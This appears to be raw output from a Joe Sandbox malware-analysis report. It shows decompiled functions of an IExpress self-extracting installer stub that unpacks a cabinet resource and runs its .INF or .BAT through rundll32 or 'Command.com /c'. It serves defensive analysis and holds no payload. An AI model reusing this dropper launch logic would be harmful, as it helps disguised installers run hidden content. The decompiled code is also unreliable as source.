                                                          					_t132 = _t156;
                                                          					_t148 =  &(_t132[1]);
                                                          					do {
                                                          						_t105 =  *_t132;
                                                          						_t132 =  &(_t132[1]);
                                                          					} while (_t105 != 0);
                                                          					_t111 = _t132 - _t148;
                                                          					if(_t111 < 3) {
                                                          						goto L12;
                                                          					}
                                                          					_t106 = _t156[1];
                                                          					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                          						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                          							goto L12;
                                                          						} else {
                                                          							goto L11;
                                                          						}
                                                          					} else {
                                                          						L11:
                                                          						E010C1680( &_v268, 0x104, _t156);
                                                          						L13:
                                                          						_t138 = 0x2e;
                                                          						_t57 = E010C66C8(_t156, _t138);
                                                          						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                          							_t139 = 0x2e;
                                                          							_t115 = _t156;
                                                          							_t58 = E010C66C8(_t115, _t139);
                                                          							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                          								_t156 = LocalAlloc(0x40, 0x400);
                                                          								if(_t156 == 0) {
                                                          									goto L43;
                                                          								}
                                                          								_t65 = GetFileAttributesA( &_v268); // executed
                                                          								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                          									E010C1680( &_v1552, 0x400, _t108);
                                                          								} else {
                                                          									_push(_t115);
                                                          									_t108 = 0x400;
                                                          									E010C1781( &_v1552, 0x400, _t115,  &_v268);
                                                          									if(_t151 != 0 &&  *_t151 != 0) {
                                                          										E010C16B3( &_v1552, 0x400, " ");
                                                          										E010C16B3( &_v1552, 0x400, _t151);
                                                          									}
                                                          								}
                                                          								_t140 = _t156;
                                                          								 *_t156 = 0;
                                                          								E010C2AAC( &_v1552, _t156, _t156);
                                                          								goto L53;
                                                          							} else {
                                                          								_t108 = "Command.com /c %s";
                                                          								_t125 = "Command.com /c %s";
                                                          								_t145 = _t125 + 1;
                                                          								do {
                                                          									_t76 =  *_t125;
                                                          									_t125 = _t125 + 1;
                                                          								} while (_t76 != 0);
                                                          								_t126 = _t125 - _t145;
                                                          								_t146 =  &_v268;
                                                          								_t157 = _t146 + 1;
                                                          								do {
                                                          									_t77 =  *_t146;
                                                          									_t146 = _t146 + 1;
                                                          								} while (_t77 != 0);
                                                          								_t140 = _t146 - _t157;
                                                          								_t154 = _t126 + 8 + _t146 - _t157;
                                                          								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                          								if(_t156 != 0) {
                                                          									E010C171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                          									goto L53;
                                                          								}
                                                          								goto L43;
                                                          							}
                                                          						} else {
                                                          							_t85 = GetFileAttributesA( &_v268);
                                                          							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                          								_t140 = 0x525;
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_t60 =  &_v268;
                                                          								goto L35;
                                                          							} else {
                                                          								_t140 = "[";
                                                          								_v1556 = _t151;
                                                          								_t90 = E010C1A84( &_v1556, "[");
                                                          								if(_t90 != 0) {
                                                          									if( *_t90 != 0) {
                                                          										_v1556 = _t90;
                                                          									}
                                                          									_t140 = "]";
                                                          									E010C1A84( &_v1556, "]");
                                                          								}
                                                          								_t156 = LocalAlloc(0x40, 0x200);
                                                          								if(_t156 == 0) {
                                                          									L43:
                                                          									_t60 = 0;
                                                          									_t140 = 0x4b5;
                                                          									_push(0);
                                                          									_push(0x10);
                                                          									_push(0);
                                                          									L35:
                                                          									_push(_t60);
                                                          									E010C44B9(0, _t140);
                                                          									_t62 = 0;
                                                          									goto L54;
                                                          								} else {
                                                          									_t155 = _v1556;
                                                          									_t92 = _t155;
                                                          									if( *_t155 == 0) {
                                                          										_t92 = "DefaultInstall";
                                                          									}
                                                          									 *0x10c9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                          									 *_v1560 = 1;
                                                          									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10c1140, _t156, 8,  &_v268) == 0) {
                                                          										 *0x10c9a34 =  *0x10c9a34 & 0xfffffffb;
                                                          										if( *0x10c9a40 != 0) {
                                                          											_t108 = "setupapi.dll";
                                                          										} else {
                                                          											_t108 = "setupx.dll";
                                                          											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                          										}
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										_push( &_v268);
                                                          										_push(_t155);
                                                          										E010C171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                          									} else {
                                                          										 *0x10c9a34 =  *0x10c9a34 | 0x00000004;
                                                          										if( *_t155 == 0) {
                                                          											_t155 = "DefaultInstall";
                                                          										}
                                                          										E010C1680(_t108, 0x104, _t155);
                                                          										_t140 = 0x200;
                                                          										E010C1680(_t156, 0x200,  &_v268);
                                                          									}
                                                          									L53:
                                                          									_t62 = 1;
                                                          									 *_v1564 = _t156;
                                                          									L54:
                                                          									_pop(_t152);
                                                          									return E010C6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}














































                                                          0x010c1af3
                                                          0x010c1afa
                                                          0x010c1b07
                                                          0x010c1b09
                                                          0x010c1b1a
                                                          0x010c1b20
                                                          0x010c1b2c
                                                          0x010c1b3b
                                                          0x010c1b40
                                                          0x010c1b2e
                                                          0x010c1b2e
                                                          0x010c1b33
                                                          0x010c1b33
                                                          0x010c1b46
                                                          0x010c1b4c
                                                          0x010c1b52
                                                          0x010c1b57
                                                          0x010c1b5d
                                                          0x010c1b61
                                                          0x010c1b9f
                                                          0x010c1b9f
                                                          0x010c1bb1
                                                          0x010c1bc2
                                                          0x00000000
                                                          0x010c1b63
                                                          0x010c1b63
                                                          0x010c1b65
                                                          0x010c1b68
                                                          0x010c1b68
                                                          0x010c1b6a
                                                          0x010c1b6b
                                                          0x010c1b6f
                                                          0x010c1b74
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1b76
                                                          0x010c1b7b
                                                          0x010c1b86
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1b8c
                                                          0x010c1b8c
                                                          0x010c1b98
                                                          0x010c1bc7
                                                          0x010c1bc9
                                                          0x010c1bcc
                                                          0x010c1bd3
                                                          0x010c1d75
                                                          0x010c1d76
                                                          0x010c1d78
                                                          0x010c1d7f
                                                          0x010c1e05
                                                          0x010c1e09
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1e12
                                                          0x010c1e1b
                                                          0x010c1e73
                                                          0x010c1e21
                                                          0x010c1e21
                                                          0x010c1e28
                                                          0x010c1e37
                                                          0x010c1e3e
                                                          0x010c1e52
                                                          0x010c1e60
                                                          0x010c1e60
                                                          0x010c1e3e
                                                          0x010c1e79
                                                          0x010c1e7b
                                                          0x010c1e84
                                                          0x00000000
                                                          0x010c1d9b
                                                          0x010c1d9b
                                                          0x010c1da0
                                                          0x010c1da2
                                                          0x010c1da5
                                                          0x010c1da5
                                                          0x010c1da7
                                                          0x010c1da8
                                                          0x010c1dac
                                                          0x010c1dae
                                                          0x010c1db4
                                                          0x010c1db7
                                                          0x010c1db7
                                                          0x010c1db9
                                                          0x010c1dba
                                                          0x010c1dbe
                                                          0x010c1dc3
                                                          0x010c1dce
                                                          0x010c1dd2
                                                          0x010c1deb
                                                          0x00000000
                                                          0x010c1df0
                                                          0x00000000
                                                          0x010c1dd2
                                                          0x010c1bf7
                                                          0x010c1bfe
                                                          0x010c1c07
                                                          0x010c1d55
                                                          0x010c1d5a
                                                          0x010c1d5b
                                                          0x010c1d5d
                                                          0x010c1d5e
                                                          0x00000000
                                                          0x010c1c1b
                                                          0x010c1c1b
                                                          0x010c1c20
                                                          0x010c1c2c
                                                          0x010c1c33
                                                          0x010c1c38
                                                          0x010c1c3a
                                                          0x010c1c3a
                                                          0x010c1c40
                                                          0x010c1c4b
                                                          0x010c1c4b
                                                          0x010c1c5d
                                                          0x010c1c61
                                                          0x010c1dd4
                                                          0x010c1dd4
                                                          0x010c1dd6
                                                          0x010c1ddb
                                                          0x010c1ddc
                                                          0x010c1dde
                                                          0x010c1d64
                                                          0x010c1d64
                                                          0x010c1d67
                                                          0x010c1d6c
                                                          0x00000000
                                                          0x010c1c67
                                                          0x010c1c67
                                                          0x010c1c6d
                                                          0x010c1c72
                                                          0x010c1c74
                                                          0x010c1c74
                                                          0x010c1c8e
                                                          0x010c1c99
                                                          0x010c1cc0
                                                          0x010c1cf8
                                                          0x010c1d07
                                                          0x010c1d23
                                                          0x010c1d09
                                                          0x010c1d14
                                                          0x010c1d1b
                                                          0x010c1d1b
                                                          0x010c1d2b
                                                          0x010c1d2d
                                                          0x010c1d2d
                                                          0x010c1d38
                                                          0x010c1d39
                                                          0x010c1d46
                                                          0x010c1cc2
                                                          0x010c1cc2
                                                          0x010c1ccc
                                                          0x010c1cce
                                                          0x010c1cce
                                                          0x010c1cdb
                                                          0x010c1ce6
                                                          0x010c1cee
                                                          0x010c1cee
                                                          0x010c1e89
                                                          0x010c1e91
                                                          0x010c1e92
                                                          0x010c1e94
                                                          0x010c1e97
                                                          0x010c1ea4
                                                          0x010c1ea4
                                                          0x010c1c61
                                                          0x010c1c07
                                                          0x010c1bd3
                                                          0x010c1b7b

                                                          APIs
                                                          • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1BE7
                                                          • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1BFE
                                                          • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 010C1C57
                                                          • GetPrivateProfileIntA.KERNEL32 ref: 010C1C88
                                                          • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010C1140,00000000,00000008,?), ref: 010C1CB8
                                                          • GetShortPathNameA.KERNEL32 ref: 010C1D1B
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-472070384
                                                          • Opcode ID: 843711e680d983d17c67d66617ae6060900f14816ac1b674637f1a5c07771e31
                                                          • Instruction ID: 19d2aa5e50768bf806fda1634d44832057beecbec3c4e7441d5fe3463c49bf67
                                                          • Opcode Fuzzy Hash: 843711e680d983d17c67d66617ae6060900f14816ac1b674637f1a5c07771e31
                                                          • Instruction Fuzzy Hash: CAA14B70A00209DFEB70AB28CC44BEE77A9AB95B10F1442DDE5D5E32C2DB759D858F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 324 10c597d-10c59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10c59dd-10c5a1b GetDiskFreeSpaceA 324->325 326 10c59bb-10c59d8 call 10c44b9 call 10c6285 324->326 328 10c5ba1-10c5bde memset call 10c6285 GetLastError FormatMessageA 325->328 329 10c5a21-10c5a4a MulDiv 325->329 341 10c5c05-10c5c14 call 10c6ce0 326->341 338 10c5be3-10c5bfc call 10c44b9 SetCurrentDirectoryA 328->338 329->328 332 10c5a50-10c5a6c GetVolumeInformationA 329->332 335 10c5a6e-10c5ab0 memset call 10c6285 GetLastError FormatMessageA 332->335 336 10c5ab5-10c5aca SetCurrentDirectoryA 332->336 335->338 340 10c5acc-10c5ad1 336->340 353 10c5c02 338->353 344 10c5ae2-10c5ae4 340->344 345 10c5ad3-10c5ad8 340->345 348 10c5ae6 344->348 349 10c5ae7-10c5af8 344->349 345->344 346 10c5ada-10c5ae0 345->346 346->340 346->344 348->349 352 10c5af9-10c5afb 349->352 354 10c5afd-10c5b03 352->354 355 10c5b05-10c5b08 352->355 356 10c5c04 353->356 354->352 354->355 357 10c5b0a-10c5b1b call 10c44b9 355->357 358 10c5b20-10c5b27 355->358 356->341 357->353 360 10c5b29-10c5b33 358->360 361 10c5b52-10c5b5b 358->361 360->361 363 10c5b35-10c5b50 360->363 364 10c5b62-10c5b6d 361->364 363->364 365 10c5b6f-10c5b74 364->365 366 10c5b76-10c5b7d 364->366 367 10c5b85 365->367 368 10c5b7f-10c5b81 366->368 369 10c5b83 366->369 370 10c5b96-10c5b9f 367->370 371 10c5b87-10c5b94 call 10c268b 367->371 368->367 369->367 370->356 371->356
                                                          C-Code - Quality: 96%
                                                          			E010C597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				char _v16;
                                                          				char _v276;
                                                          				char _v788;
                                                          				long _v792;
                                                          				long _v796;
                                                          				long _v800;
                                                          				signed int _v804;
                                                          				long _v808;
                                                          				int _v812;
                                                          				long _v816;
                                                          				long _v820;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t46;
                                                          				int _t50;
                                                          				signed int _t55;
                                                          				void* _t66;
                                                          				int _t69;
                                                          				signed int _t73;
                                                          				signed short _t78;
                                                          				signed int _t87;
                                                          				signed int _t101;
                                                          				int _t102;
                                                          				unsigned int _t103;
                                                          				unsigned int _t105;
                                                          				signed int _t111;
                                                          				long _t112;
                                                          				signed int _t116;
                                                          				CHAR* _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          
                                                          				_t114 = __edi;
                                                          				_t46 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t46 ^ _t120;
                                                          				_v804 = __edx;
                                                          				_t118 = __ecx;
                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                          				if(_t50 != 0) {
                                                          					_push(__edi);
                                                          					_v796 = 0;
                                                          					_v792 = 0;
                                                          					_v800 = 0;
                                                          					_v808 = 0;
                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                          					__eflags = _t55;
                                                          					if(_t55 == 0) {
                                                          						L29:
                                                          						memset( &_v788, 0, 0x200);
                                                          						 *0x10c9124 = E010C6285();
                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          						_t110 = 0x4b0;
                                                          						L30:
                                                          						__eflags = 0;
                                                          						E010C44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                          						SetCurrentDirectoryA( &_v276);
                                                          						L31:
                                                          						_t66 = 0;
                                                          						__eflags = 0;
                                                          						L32:
                                                          						_pop(_t114);
                                                          						goto L33;
                                                          					}
                                                          					_t69 = _v792 * _v796;
                                                          					_v812 = _t69;
                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                          					__eflags = _t116;
                                                          					if(_t116 == 0) {
                                                          						goto L29;
                                                          					}
                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                          					__eflags = _t73;
                                                          					if(_t73 != 0) {
                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                          						_t101 =  &_v16;
                                                          						_t111 = 6;
                                                          						_t119 = _t118 - _t101;
                                                          						__eflags = _t119;
                                                          						while(1) {
                                                          							_t22 = _t111 - 4; // 0x2
                                                          							__eflags = _t22;
                                                          							if(_t22 == 0) {
                                                          								break;
                                                          							}
                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                          							__eflags = _t87;
                                                          							if(_t87 == 0) {
                                                          								break;
                                                          							}
                                                          							 *_t101 = _t87;
                                                          							_t101 = _t101 + 1;
                                                          							_t111 = _t111 - 1;
                                                          							__eflags = _t111;
                                                          							if(_t111 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t111;
                                                          						if(_t111 == 0) {
                                                          							_t101 = _t101 - 1;
                                                          							__eflags = _t101;
                                                          						}
                                                          						 *_t101 = 0;
                                                          						_t112 = 0x200;
                                                          						_t102 = _v812;
                                                          						_t78 = 0;
                                                          						_t118 = 8;
                                                          						while(1) {
                                                          							__eflags = _t102 - _t112;
                                                          							if(_t102 == _t112) {
                                                          								break;
                                                          							}
                                                          							_t112 = _t112 + _t112;
                                                          							_t78 = _t78 + 1;
                                                          							__eflags = _t78 - _t118;
                                                          							if(_t78 < _t118) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t78 - _t118;
                                                          						if(_t78 != _t118) {
                                                          							__eflags =  *0x10c9a34 & 0x00000008;
                                                          							if(( *0x10c9a34 & 0x00000008) == 0) {
                                                          								L20:
                                                          								_t103 =  *0x10c9a38; // 0x0
                                                          								_t110 =  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4));
                                                          								L21:
                                                          								__eflags = (_v804 & 0x00000003) - 3;
                                                          								if((_v804 & 0x00000003) != 3) {
                                                          									__eflags = _v804 & 0x00000001;
                                                          									if((_v804 & 0x00000001) == 0) {
                                                          										__eflags = _t103 - _t116;
                                                          									} else {
                                                          										__eflags = _t110 - _t116;
                                                          									}
                                                          								} else {
                                                          									__eflags = _t103 + _t110 - _t116;
                                                          								}
                                                          								if(__eflags <= 0) {
                                                          									 *0x10c9124 = 0;
                                                          									_t66 = 1;
                                                          								} else {
                                                          									_t66 = E010C268B(_a4, _t110, _t103,  &_v16);
                                                          								}
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _v816 & 0x00008000;
                                                          							if((_v816 & 0x00008000) == 0) {
                                                          								goto L20;
                                                          							}
                                                          							_t105 =  *0x10c9a38; // 0x0
                                                          							_t110 =  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x10c89e0 + (_t78 & 0x0000ffff) * 4));
                                                          							_t103 = (_t105 >> 2) +  *0x10c9a38;
                                                          							goto L21;
                                                          						}
                                                          						_t110 = 0x4c5;
                                                          						E010C44B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                          						goto L31;
                                                          					}
                                                          					memset( &_v788, 0, 0x200);
                                                          					 *0x10c9124 = E010C6285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          					_t110 = 0x4f9;
                                                          					goto L30;
                                                          				} else {
                                                          					_t110 = 0x4bc;
                                                          					E010C44B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t66 = 0;
                                                          					L33:
                                                          					return E010C6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                          				}
                                                          			}



































                                                          0x010c597d
                                                          0x010c5988
                                                          0x010c598f
                                                          0x010c599a
                                                          0x010c59a6
                                                          0x010c59a8
                                                          0x010c59af
                                                          0x010c59b9
                                                          0x010c59dd
                                                          0x010c59e4
                                                          0x010c59f1
                                                          0x010c59fe
                                                          0x010c5a0b
                                                          0x010c5a13
                                                          0x010c5a19
                                                          0x010c5a1b
                                                          0x010c5ba1
                                                          0x010c5baf
                                                          0x010c5bbd
                                                          0x010c5bd8
                                                          0x010c5bde
                                                          0x010c5be3
                                                          0x010c5bec
                                                          0x010c5bf0
                                                          0x010c5bfc
                                                          0x010c5c02
                                                          0x010c5c02
                                                          0x010c5c02
                                                          0x010c5c04
                                                          0x010c5c04
                                                          0x00000000
                                                          0x010c5c04
                                                          0x010c5a27
                                                          0x010c5a3a
                                                          0x010c5a46
                                                          0x010c5a48
                                                          0x010c5a4a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5a64
                                                          0x010c5a6a
                                                          0x010c5a6c
                                                          0x010c5abc
                                                          0x010c5ac2
                                                          0x010c5ac9
                                                          0x010c5aca
                                                          0x010c5aca
                                                          0x010c5acc
                                                          0x010c5acc
                                                          0x010c5acf
                                                          0x010c5ad1
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5ad3
                                                          0x010c5ad6
                                                          0x010c5ad8
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5ada
                                                          0x010c5adc
                                                          0x010c5add
                                                          0x010c5add
                                                          0x010c5ae0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5ae0
                                                          0x010c5ae2
                                                          0x010c5ae4
                                                          0x010c5ae6
                                                          0x010c5ae6
                                                          0x010c5ae6
                                                          0x010c5ae9
                                                          0x010c5aeb
                                                          0x010c5af0
                                                          0x010c5af6
                                                          0x010c5af8
                                                          0x010c5af9
                                                          0x010c5af9
                                                          0x010c5afb
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5afd
                                                          0x010c5aff
                                                          0x010c5b00
                                                          0x010c5b03
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5b03
                                                          0x010c5b05
                                                          0x010c5b08
                                                          0x010c5b20
                                                          0x010c5b27
                                                          0x010c5b52
                                                          0x010c5b52
                                                          0x010c5b5b
                                                          0x010c5b62
                                                          0x010c5b6b
                                                          0x010c5b6d
                                                          0x010c5b76
                                                          0x010c5b7d
                                                          0x010c5b83
                                                          0x010c5b7f
                                                          0x010c5b7f
                                                          0x010c5b7f
                                                          0x010c5b6f
                                                          0x010c5b72
                                                          0x010c5b72
                                                          0x010c5b85
                                                          0x010c5b98
                                                          0x010c5b9e
                                                          0x010c5b87
                                                          0x010c5b8f
                                                          0x010c5b8f
                                                          0x00000000
                                                          0x010c5b85
                                                          0x010c5b29
                                                          0x010c5b33
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5b35
                                                          0x010c5b48
                                                          0x010c5b4a
                                                          0x00000000
                                                          0x010c5b4a
                                                          0x010c5b0f
                                                          0x010c5b16
                                                          0x00000000
                                                          0x010c5b16
                                                          0x010c5a7c
                                                          0x010c5a8a
                                                          0x010c5aa5
                                                          0x010c5aab
                                                          0x00000000
                                                          0x010c59bb
                                                          0x010c59c0
                                                          0x010c59c7
                                                          0x010c59d1
                                                          0x010c59d6
                                                          0x010c5c05
                                                          0x010c5c14
                                                          0x010c5c14

                                                          APIs
                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010C59A8
                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 010C59AF
                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 010C5A13
                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 010C5A40
                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 010C5A64
                                                          • memset.MSVCRT ref: 010C5A7C
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010C5A98
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010C5AA5
                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 010C5BFC
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID:
                                                          • API String ID: 4237285672-0
                                                          • Opcode ID: cfe0f7ace8cf35a489a83c34b571db2955eb3cdf7b6e7226f611a8e2e7aae47a
                                                          • Instruction ID: 70a85ed3b4597c2ab662258453f80501a4a2fa558c6f14e52f28e34103818e61
                                                          • Opcode Fuzzy Hash: cfe0f7ace8cf35a489a83c34b571db2955eb3cdf7b6e7226f611a8e2e7aae47a
                                                          • Instruction Fuzzy Hash: 217193B5A0020CAFEB259B64CC85BFE77ADFB88744F1440ADF585D3184EA359E848F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 374 10c4fe0-10c501a call 10c468f FindResourceA LoadResource LockResource 377 10c5020-10c5027 374->377 378 10c5161-10c5163 374->378 379 10c5029-10c5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 10c5057-10c505e call 10c4efd 377->380 379->380 383 10c507c-10c50b4 380->383 384 10c5060-10c5077 call 10c44b9 380->384 389 10c50e8-10c5104 call 10c44b9 383->389 390 10c50b6-10c50da 383->390 388 10c5107-10c510e 384->388 392 10c511d-10c511f 388->392 393 10c5110-10c5117 FreeResource 388->393 398 10c5106 389->398 390->398 402 10c50dc 390->402 395 10c513a-10c5141 392->395 396 10c5121-10c5127 392->396 393->392 400 10c515f 395->400 401 10c5143-10c514a 395->401 396->395 399 10c5129-10c5135 call 10c44b9 396->399 398->388 399->395 400->378 401->400 404 10c514c-10c5159 SendMessageA 401->404 405 10c50e3-10c50e6 402->405 404->400 405->389 405->398
                                                          C-Code - Quality: 77%
                                                          			E010C4FE0(void* __edi, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* _t8;
                                                          				struct HWND__* _t9;
                                                          				int _t10;
                                                          				void* _t12;
                                                          				struct HWND__* _t24;
                                                          				struct HWND__* _t27;
                                                          				intOrPtr _t29;
                                                          				void* _t33;
                                                          				int _t34;
                                                          				CHAR* _t36;
                                                          				int _t37;
                                                          				intOrPtr _t47;
                                                          
                                                          				_t33 = __edi;
                                                          				_t36 = "CABINET";
                                                          				 *0x10c9144 = E010C468F(_t36, 0, 0);
                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                          				 *0x10c9140 = _t8;
                                                          				if(_t8 == 0) {
                                                          					return _t8;
                                                          				}
                                                          				_t9 =  *0x10c8584; // 0x0
                                                          				if(_t9 != 0) {
                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                          					ShowWindow(GetDlgItem( *0x10c8584, 0x841), 5);
                                                          				}
                                                          				_t10 = E010C4EFD(0, 0);
                                                          				if(_t10 != 0) {
                                                          					__imp__#20(E010C4CA0, E010C4CC0, E010C4980, E010C4A50, E010C4AD0, E010C4B60, E010C4BC0, 1, 0x10c9148, _t33);
                                                          					_t34 = _t10;
                                                          					if(_t34 == 0) {
                                                          						L8:
                                                          						_t29 =  *0x10c9148; // 0x0
                                                          						_t24 =  *0x10c8584; // 0x0
                                                          						E010C44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                          						_t37 = 0;
                                                          						L9:
                                                          						goto L10;
                                                          					}
                                                          					__imp__#22(_t34, "*MEMCAB", 0x10c1140, 0, E010C4CD0, 0, 0x10c9140); // executed
                                                          					_t37 = _t10;
                                                          					if(_t37 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					__imp__#23(_t34); // executed
                                                          					if(_t10 != 0) {
                                                          						goto L9;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					_t27 =  *0x10c8584; // 0x0
                                                          					E010C44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                          					_t37 = 0;
                                                          					L10:
                                                          					_t12 =  *0x10c9140; // 0x0
                                                          					if(_t12 != 0) {
                                                          						FreeResource(_t12);
                                                          						 *0x10c9140 = 0;
                                                          					}
                                                          					if(_t37 == 0) {
                                                          						_t47 =  *0x10c91d8; // 0x0
                                                          						if(_t47 == 0) {
                                                          							E010C44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                          						}
                                                          					}
                                                          					if(( *0x10c8a38 & 0x00000001) == 0 && ( *0x10c9a34 & 0x00000001) == 0) {
                                                          						SendMessageA( *0x10c8584, 0xfa1, _t37, 0);
                                                          					}
                                                          					return _t37;
                                                          				}
                                                          			}
















                                                          0x010c4fe0
                                                          0x010c4fe6
